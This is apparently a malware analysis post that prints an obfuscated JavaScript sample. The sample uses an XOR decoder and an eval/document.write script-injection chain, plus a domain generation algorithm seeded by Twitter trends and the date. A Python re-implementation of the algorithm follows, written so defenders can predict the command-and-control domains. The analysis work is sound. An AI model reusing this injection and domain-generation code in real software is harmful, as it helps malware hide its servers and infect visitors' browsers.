var d='fbcmfir.com'; var shiftIndex = 0;for (var i in window.tw.trends){if (window.h > 8 && window.h < 21 && i.indexOf(' 07') > -1){shiftIndex = window.tw.trends[i][4].query.charCodeAt(1) + window.tw.trends[i][4].query.length;break;}else if ((window.h < 9 || window.h > 20) && i.indexOf(' 18') > -1){shiftIndex = window.tw.trends[i][4].query.charCodeAt(1) + 10 +window.tw.trends[i][4].query.length;break;}}if (shiftIndex == 0 ){shiftIndex = window.tw.trends[i][6].query.charCodeAt(1) + 7 +window.tw.trends[i][6].query.length;} if (shiftIndex > 0){var time = new Array();time['year'] = window.gd.getUTCFullYear();time['month'] = window.gd.getUTCMonth()+1;time['day'] = window.gd.getUTCDate();var d='fbcmfir.com';var months = new Array('uno', 'dve', 'thr', 'fir', 'vif', 'xes', 'ves', 'ght', 'eni', 'etn', 'lev', 'twe');var letters = new Array('a','b','c','d','e','f','g','h','j','i','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');var numbers = new Array(1,2,3,4,5,6,7,8,9); function CalculateMagicNumber(day, month, year, index){return (((year + (index * day)) + (month ^ day) * index) + day);} var yearCh1, yearCh2, monthCh, dayCh, num; num = CalculateMagicNumber(time['day'], time['month'], time['year'], shiftIndex);yearCh1 = letters[(((time['year'] & 0xAA) + num) % 63) % 26] + letters[(((time['year'] & 0xAA) << 2) + num) % 25]; yearCh2 = letters[((((time['year'] & 0x3311) >> 3) + num) % 10)] + letters[((((time['year'] & 0x3311) >> 4) + num) % 10)]; monthCh = letters[((time['month'] + num) % 25)] + letters[((time['month'] * num) % 25)];dayCh = letters[((time['day'] * 6) % 27)]; timeCh = dayCh = letters[((time['day'] * num) % 24)];$a=$a.replace(d,dayCh + yearCh2 + monthCh + yearCh1 + dayCh + months[time['month'] - 1] + '.com');}


// if we put them all together we will have the PSEUDO RANDOM!! see below....

function dw(t)
{
ca='%64ocu%6den%74.%77ri%74e(%22'; //<=====The crook's way to obfs "<script language=\"javascript\"><\/script>"
ce='%22)';
cb='%3cs%63rip%74 %6c%61%6e%67uag%65%3d%5c%22javascr%69p%74%5c%22%3e';
cc='%3c%5c%2fscrip%74%3e';
eval(unescape(t))
}
;function dcs(ds,es)
{
ds=unescape(ds);
st=tmp='';
for(i=0;
i<ds.length;
i++)
{
tmp=ds.slice(i,i+1);
st=st+String.fromCharCode((tmp.charCodeAt(0)^('0x00'+es)));
}

}
dw(dcs(cu,14));
$a=st;
dcs(da+db+dc+dd+de,10);
dw(st);
st=$a;
function dw(t)
{
ca='%64ocu%6den%74.%77ri%74e(%22'; //<=====The crook's way to obfs "<script language=\"javascript\"><\/script>"
ce='%22)';
cb='%3cs%63rip%74 %6c%61%6e%67uag%65%3d%5c%22javascr%69p%74%5c%22%3e';
cc='%3c%5c%2fscrip%74%3e';
eval(unescape(t))
}
;function cz(cz)
{
return ca+cb+cc+cd+ce+cz;
}
;$a="dw(dcs(cu,14));
";
st="$a=st;
dcs(da+db+dc+dd+de,10);
dw(st);
st=$a;
";
dw(dz+cz($a+st));


var d='fbcmfir.com';
var shiftIndex = 0;
for (var i in window.tw.trends)
{
if (window.h > 8 && window.h < 21 && i.indexOf(' 07') > -1)
{
shiftIndex = window.tw.trends[i][4].query.charCodeAt(1) + window.tw.trends[i][4].query.length;
break;
}
else if ((window.h < 9 || window.h > 20) && i.indexOf(' 18') > -1)
{
shiftIndex = window.tw.trends[i][4].query.charCodeAt(1) + 10 +window.tw.trends[i][4].query.length;
break;
}

}
if (shiftIndex == 0 )
{
shiftIndex = window.tw.trends[i][6].query.charCodeAt(1) + 7 +window.tw.trends[i][6].query.length;
}
if (shiftIndex > 0)
{

//====================The PseudoRandom/DGA Generator is from here=============================
var time = new Array();
time['year'] = window.gd.getUTCFullYear();
time['month'] = window.gd.getUTCMonth()+1;
time['day'] = window.gd.getUTCDate();
var d='fbcmfir.com';
var months = new Array('uno', 'dve', 'thr', 'fir', 'vif', 'xes', 'ves', 'ght', 'eni', 'etn', 'lev', 'twe');
var letters = new Array('a','b','c','d','e','f','g','h','j','i','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
var numbers = new Array(1,2,3,4,5,6,7,8,9);
function CalculateMagicNumber(day, month, year, index)
{
return (((year + (index * day)) + (month ^ day) * index) + day);
}
var yearCh1, yearCh2, monthCh, dayCh, num;
num = CalculateMagicNumber(time['day'], time['month'], time['year'], shiftIndex);
yearCh1 = letters[(((time['year'] & 0xAA) + num) % 63) % 26] + letters[(((time['year'] & 0xAA) << 2) + num) % 25];
yearCh2 = letters[((((time['year'] & 0x3311) >> 3) + num) % 10)] + letters[((((time['year'] & 0x3311) >> 4) + num) % 10)];
monthCh = letters[((time['month'] + num) % 25)] + letters[((time['month'] * num) % 25)];
dayCh = letters[((time['day'] * 6) % 27)];
timeCh = dayCh = letters[((time['day'] * num) % 24)];
$a=$a.replace(d,dayCh + yearCh2 + monthCh + yearCh1 + dayCh + months[time['month'] - 1] + '.com');
}
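The generator above, re-implemented in Python as an added example (not the sample's own code) so a defender can compute the domain a given day and trend feed would produce: the reference date comes from the feed's as_of epoch (2 or 3 days back depending on the UTC hour), shiftIndex from the trend slot chosen by that hour, and the letters from CalculateMagicNumber. The trends feed and its as_of value are constructed here (the epoch is the Date header of the fetch above), since the live search.twitter.com response is not on the page:

```python
"""Added example: the date- and trend-driven domain generator from the fourth
eval, re-implemented in Python. Not the sample's own code."""
from datetime import datetime, timedelta, timezone

MONTHS = ['uno', 'dve', 'thr', 'fir', 'vif', 'xes', 'ves', 'ght', 'eni', 'etn', 'lev', 'twe']
# the sample's alphabet has 'j' and 'i' swapped; keep it, the output depends on it
LETTERS = list('abcdefghjiklmnopqrstuvwxyz')


def reference_date(as_of_epoch):
    """callback(): from the feed's 'as_of' epoch derive the UTC hour and the
    date the generator keys on (2 days back after 08:00 UTC, otherwise 3)."""
    d = datetime.fromtimestamp(as_of_epoch, tz=timezone.utc)
    h = d.hour
    d -= timedelta(days=2 if h > 8 else 3)
    return h, d


def shift_index(trends, hour):
    """Fourth eval: shiftIndex comes from the trend slot chosen by the hour.
    `trends` mirrors window.tw.trends: {'YYYY-MM-DD HH:MM': [{'query': ..}, ..]}."""
    shift = 0
    key = None
    for key in trends:  # JS for-in over such keys walks insertion order as well
        if 8 < hour < 21 and ' 07' in key:
            q = trends[key][4]['query']
            shift = ord(q[1]) + len(q)
            break
        if (hour < 9 or hour > 20) and ' 18' in key:
            q = trends[key][4]['query']
            shift = ord(q[1]) + 10 + len(q)
            break
    if shift == 0:  # fallback reads slot [6] of whichever key the loop ended on
        q = trends[key][6]['query']
        shift = ord(q[1]) + 7 + len(q)
    return shift


def magic_number(day, month, year, index):
    """CalculateMagicNumber() as written in the sample."""
    return ((year + (index * day)) + (month ^ day) * index) + day


def generate_domain(date, shift):
    """The letter arithmetic that replaces the placeholder 'fbcmfir.com'."""
    y, m, d = date.year, date.month, date.day
    num = magic_number(d, m, y, shift)
    year_ch1 = LETTERS[(((y & 0xAA) + num) % 63) % 26] + LETTERS[(((y & 0xAA) << 2) + num) % 25]
    year_ch2 = LETTERS[(((y & 0x3311) >> 3) + num) % 10] + LETTERS[(((y & 0x3311) >> 4) + num) % 10]
    month_ch = LETTERS[(m + num) % 25] + LETTERS[(m * num) % 25]
    # the sample first sets dayCh = letters[(day * 6) % 27] (index 26 would be
    # undefined) and then overwrites it, so only the % 24 form reaches the domain
    day_ch = LETTERS[(d * num) % 24]
    return day_ch + year_ch2 + month_ch + year_ch1 + day_ch + MONTHS[m - 1] + '.com'


def expected_domain(as_of_epoch, trends):
    """Whole chain: as_of -> reference date, feed -> shiftIndex -> domain."""
    hour, date = reference_date(as_of_epoch)
    return generate_domain(date, shift_index(trends, hour))


# constructed feed: 'as_of' is 2012-11-11 16:27:44 UTC (the Date header of the
# fetch above); the queries are made up, only slot [4] of the ' 07' entry is
# read for a visit at 16:00 UTC
SAMPLE_AS_OF = 1352651264
SAMPLE_TRENDS = {
    '2012-11-11 07:00': [{'query': '#t%d' % n} for n in range(4)]
                        + [{'query': '#sample'}]
                        + [{'query': '#t%d' % n} for n in range(5, 8)],
    '2012-11-11 18:00': [{'query': '#x%d' % n} for n in range(8)],
}

if __name__ == '__main__':
    print(expected_domain(SAMPLE_AS_OF, SAMPLE_TRENDS))  # dbcysjhdlev.com
```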
----------------------
Lord, forgive us our debts,
save us from the fire below,
lead all souls into heaven,
especially those most in need of your mercy.
#MalwareMustDie!!!